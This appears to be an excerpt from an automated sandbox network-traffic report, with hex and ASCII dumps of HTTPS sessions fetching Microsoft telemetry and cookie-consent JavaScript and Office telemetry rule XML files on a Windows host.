                                                                                                                                                                          2024-11-23 18:01:57 UTC16384INData Raw: 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 57 69 74 68 44 61 74 61 42 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 7e 74 5b 6e 5d 2e 6e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 22 64 61 74 61 2d 62 69 2d 22 29 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 22 64 61 74 61 2d 6d 22 3d 3d 3d 74 5b 6e 5d 2e 6e 61 6d 65 7c 7c 7e 74 5b 6e 5d 2e 6e 61 6d 65 2e 69 6e 64 65 78 4f 66
                                                                                                                                                                          Data Ascii: otype._isTrackedWithDataBi=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if(~t[n].name.indexOf("data-bi-"))return!0;return!1},Ap.prototype._isTracked=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if("data-m"===t[n].name||~t[n].name.indexOf
                                                                                                                                                                          2024-11-23 18:01:57 UTC16384INData Raw: 65 6e 22 2c 67 67 3d 22 6d 73 66 70 63 22 2c 76 67 3d 22 75 73 65 72 22 2c 68 67 3d 22 61 6c 6c 6f 77 52 65 71 75 65 73 74 53 65 6e 64 69 6e 67 22 2c 6d 67 3d 22 66 69 72 73 74 52 65 71 75 65 73 74 53 65 6e 74 22 2c 79 67 3d 22 73 68 6f 75 6c 64 41 64 64 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 73 22 2c 43 67 3d 22 67 65 74 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 56 61 6c 75 65 22 2c 62 67 3d 22 73 65 74 43 6c 6f 63 6b 53 6b 65 77 22 2c 79 65 3d 22 6c 65 6e 67 74 68 22 2c 54 67 3d 22 63 6f 6e 63 61 74 22 2c 49 67 3d 22 69 4b 65 79 22 2c 45 67 3d 22 63 6f 75 6e 74 22 2c 5f 67 3d 22 65 76 65 6e 74 73 22 2c 53 67 3d 22 70 75 73 68 22 2c 78 67 3d 22 73 70 6c 69 74 22 2c 4e 67 3d 22 73 70 6c 69 63 65 22 2c 44 67 3d 22 74 6f 4c 6f 77 65 72 43 61 73 65
                                                                                                                                                                          Data Ascii: en",gg="msfpc",vg="user",hg="allowRequestSending",mg="firstRequestSent",yg="shouldAddClockSkewHeaders",Cg="getClockSkewHeaderValue",bg="setClockSkew",ye="length",Tg="concat",Ig="iKey",Eg="count",_g="events",Sg="push",xg="split",Ng="splice",Dg="toLowerCase
                                                                                                                                                                          2024-11-23 18:01:57 UTC16384INData Raw: 5b 6c 76 5d 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 69 66 28 65 5b 79 76 5d 7c 7c 28 65 5b 79 76 5d 3d 30 29 2c 65 5b 43 76 5d 7c 7c 28 65 5b 43 76 5d 3d 31 29 2c 6c 28 65 29 2c 65 5b 62 76 5d 29 69 66 28 55 7c 7c 61 65 29 65 5b 43 76 5d 3d 33 2c 65 5b 62 76 5d 3d 21 31 3b 65 6c 73 65 20 69 66 28 48 29 72 65 74 75 72 6e 20 57 26 26 28 65 3d 65 61 28 65 29 29 2c 48 5b 72 76 5d 28 45 76 2e 63 72 65 61 74 65 28 65 5b 49 67 5d 2c 5b 65 5d 29 2c 21 30 3d 3d 3d 65 5b 62 76 5d 3f 31 3a 65 5b 62 76 5d 2c 33 29 3b 76 61 72 20 6e 3d 65 5b 43 76 5d 2c 72 3d 63 65 2c 69 3d 52 2c 61 3d 28 34 3d 3d 3d 6e 26 26 28 72 3d 6f 65 2c 69 3d 4f 29 2c 21 31 29 3b 72 3c 69 3f 61 3d 21 43 28 65 2c 74 29 3a 28 72 3d 31 2c 69 3d 32 30 2c 34 3d 3d 3d 6e 26 26 28
                                                                                                                                                                          Data Ascii: [lv])))}function a(e,t){if(e[yv]||(e[yv]=0),e[Cv]||(e[Cv]=1),l(e),e[bv])if(U||ae)e[Cv]=3,e[bv]=!1;else if(H)return W&&(e=ea(e)),H[rv](Ev.create(e[Ig],[e]),!0===e[bv]?1:e[bv],3);var n=e[Cv],r=ce,i=R,a=(4===n&&(r=oe,i=O),!1);r<i?a=!C(e,t):(r=1,i=20,4===n&&(


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          73192.168.2.54980013.107.246.634436500C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:57 UTC551OUTGET /mscc/lib/v2/wcp-consent.js HTTP/1.1
                                                                                                                                                                          Host: wcpstatic.microsoft.com
                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Sec-Fetch-Site: same-site
                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                          Referer: https://learn.microsoft.com/
                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          2024-11-23 18:01:57 UTC713INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:57 GMT
                                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                                          Content-Length: 52717
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                          Age: 39383
                                                                                                                                                                          Cache-Control: max-age=43200
                                                                                                                                                                          Content-MD5: QT/MdZzBmCG2G2lBgIsptQ==
                                                                                                                                                                          Etag: 0x8DA85F6F74C6D08
                                                                                                                                                                          Last-Modified: Wed, 24 Aug 2022 17:34:58 GMT
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          X-Cache: CONFIG_NOCACHE
                                                                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                                                                          x-ms-request-id: 3774b461-701e-003c-4476-3de918000000
                                                                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                                                                          x-azure-ref: 20241123T180157Z-15b8b599d88qw29phC1TEB5zag000000035000000000ma1a
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:57 UTC15671INData Raw: 76 61 72 20 57 63 70 43 6f 6e 73 65 6e 74 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 32 32 39 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 77 69 6e 64 6f 77 2c 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 6e 29 7b 69 66 28 74 5b 6e 5d 29 72 65 74 75 72 6e 20 74 5b 6e 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 72 3d 74 5b 6e 5d 3d 7b 69 3a 6e 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 6e 5d 2e 63 61 6c 6c 28 72 2e 65 78 70 6f 72 74 73 2c 72 2c 72 2e 65 78 70 6f 72 74 73 2c 6f 29 2c 72 2e 6c 3d 21 30 2c 72 2e 65 78 70 6f 72 74 73 7d 72 65 74 75 72 6e 20 6f 2e 6d 3d 65 2c 6f 2e 63 3d 74 2c 6f 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65
                                                                                                                                                                          Data Ascii: var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e
                                                                                                                                                                          2024-11-23 18:01:57 UTC16384INData Raw: 29 7b 72 65 74 75 72 6e 20 65 3f 65 2e 72 65 70 6c 61 63 65 28 2f 26 2f 67 2c 22 26 61 6d 70 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3c 2f 67 2c 22 26 6c 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3e 2f 67 2c 22 26 67 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 22 2f 67 2c 22 26 71 75 6f 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 27 2f 67 2c 22 26 23 30 33 39 3b 22 29 3a 22 22 7d 2c 65 7d 28 29 2c 61 3d 6e 2e 6c 6f 63 61 6c 73 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 2c 6f 2c 6e 2c 72 2c 69 2c 61 29 7b 74 68 69 73 2e 64 69 72 65 63 74 69 6f 6e 3d 22 6c 74 72 22 2c 74 68 69 73 2e 70 72 65 76 69 6f 75 73 46 6f 63 75 73 45 6c 65 6d 65 6e 74 42 65 66 6f 72 65 50 6f 70 75 70 3d 6e 75 6c 6c 2c 74 68 69 73 2e 63 6f 6f 6b 69
                                                                                                                                                                          Data Ascii: ){return e?e.replace(/&/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;").replace(/"/g,"&quot;").replace(/'/g,"&#039;"):""},e}(),a=n.locals,l=function(){function e(e,t,o,n,r,i,a){this.direction="ltr",this.previousFocusElementBeforePopup=null,this.cooki
                                                                                                                                                                          2024-11-23 18:01:57 UTC712INData Raw: 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c 61 62 65 6c 3a 68 6f 76 65 72 3a 3a 61 66 74 65 72 20 7b 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 68 6f 76 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c
                                                                                                                                                                          Data Ascii: or"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + label:hover::after {\n background-color: "+e["radio-button-hover-background-color"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + l
                                                                                                                                                                          2024-11-23 18:01:57 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2d 63 6f 6c 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 7d 2c 65 7d 28 29 2c 64 3d 5b 22 61 72 22 2c 22 68 65 22 2c 22 70 73 22 2c 22 75 72 22 2c 22 66 61 22 2c 22 70 61 22 2c 22 73 64 22 2c 22 74 6b 22 2c 22 75 67 22 2c 22 79 69 22 2c 22 73 79 72 22 2c 22 6b 73 2d 61 72 61 62 22 5d 2c 75 3d 7b 22 63 6c 6f 73 65 2d 62 75 74 74 6f 6e 2d 63 6f 6c 6f 72 22 3a 22 23 36 36 36 36 36 36 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2d 6f 70 61 63 69 74 79 22 3a 22 31 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e
                                                                                                                                                                          Data Ascii: background-color: "+e["radio-button-disabled-color"]+" !important;\n }"},e}(),d=["ar","he","ps","ur","fa","pa","sd","tk","ug","yi","syr","ks-arab"],u={"close-button-color":"#666666","secondary-button-disabled-opacity":"1","secondary-button
                                                                                                                                                                          2024-11-23 18:01:57 UTC3566INData Raw: 22 2d 22 29 5b 30 5d 3b 6f 3d 65 2e 73 70 6c 69 74 28 22 2d 22 29 5b 30 5d 3d 3d 3d 6e 7d 72 65 74 75 72 6e 20 6f 7d 28 65 2c 63 29 7d 29 29 3b 73 26 26 30 3d 3d 3d 73 2e 6c 65 6e 67 74 68 26 26 28 65 3d 22 65 6e 2d 55 53 22 29 2c 6f 2e 70 6c 61 63 65 68 6f 6c 64 65 72 45 6c 65 6d 65 6e 74 3d 6c 2c 72 26 26 6f 2e 63 6f 6e 73 65 6e 74 43 68 61 6e 67 65 64 43 61 6c 6c 62 61 63 6b 73 2e 72 65 67 69 73 74 65 72 43 61 6c 6c 62 61 63 6b 28 72 29 2c 6f 2e 73 61 76 65 43 6f 6f 6b 69 65 28 29 2c 6f 2e 73 69 74 65 43 6f 6e 73 65 6e 74 3d 6e 65 77 20 66 28 21 31 29 2c 6e 75 6c 6c 3d 3d 6e 7c 7c 6e 28 76 6f 69 64 20 30 2c 6f 2e 73 69 74 65 43 6f 6e 73 65 6e 74 29 2c 6f 2e 69 73 49 6e 69 74 52 65 61 64 79 3d 21 30 2c 74 68 69 73 2e 63 6f 6e 73 65 6e 74 43 68 61 6e 67
                                                                                                                                                                          Data Ascii: "-")[0];o=e.split("-")[0]===n}return o}(e,c)}));s&&0===s.length&&(e="en-US"),o.placeholderElement=l,r&&o.consentChangedCallbacks.registerCallback(r),o.saveCookie(),o.siteConsent=new f(!1),null==n||n(void 0,o.siteConsent),o.isInitReady=!0,this.consentChang


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          74192.168.2.54980213.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:57 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:57 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:57 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 474
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                          ETag: "0x8DC582BB3F48DAE"
                                                                                                                                                                          x-ms-request-id: 3b3ce442-a01e-001e-3708-3d49ef000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180157Z-178bfbc474btrnf9hC1NYCb80g00000005100000000041am
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:57 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          75192.168.2.54980513.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:57 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:57 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:57 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 469
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                          ETag: "0x8DC582BB3CAEBB8"
                                                                                                                                                                          x-ms-request-id: c700c3f3-301e-0000-760a-3deecc000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180157Z-178bfbc474b9fdhphC1NYCac0n00000004pg00000000fav7
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:57 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          76192.168.2.54980313.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:57 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:57 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:57 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 407
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                          ETag: "0x8DC582B9D30478D"
                                                                                                                                                                          x-ms-request-id: 04c68412-701e-000d-5268-3b6de3000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180157Z-178bfbc474bxkclvhC1NYC69g400000004ug0000000030d5
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:57 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          77192.168.2.54980413.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:57 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:57 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:57 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 408
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                          ETag: "0x8DC582BB9B6040B"
                                                                                                                                                                          x-ms-request-id: d30a14f9-501e-0029-5748-3dd0b8000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180157Z-15b8b599d882hxlwhC1TEBfa5w00000003800000000041y3
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:57 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          78192.168.2.54980613.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:57 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:57 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:57 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 416
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                          ETag: "0x8DC582BB5284CCE"
                                                                                                                                                                          x-ms-request-id: 5f785e56-701e-0053-0854-3c3a0a000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180157Z-178bfbc474bnwsh4hC1NYC2ubs00000004t000000000k8y9
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:57 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
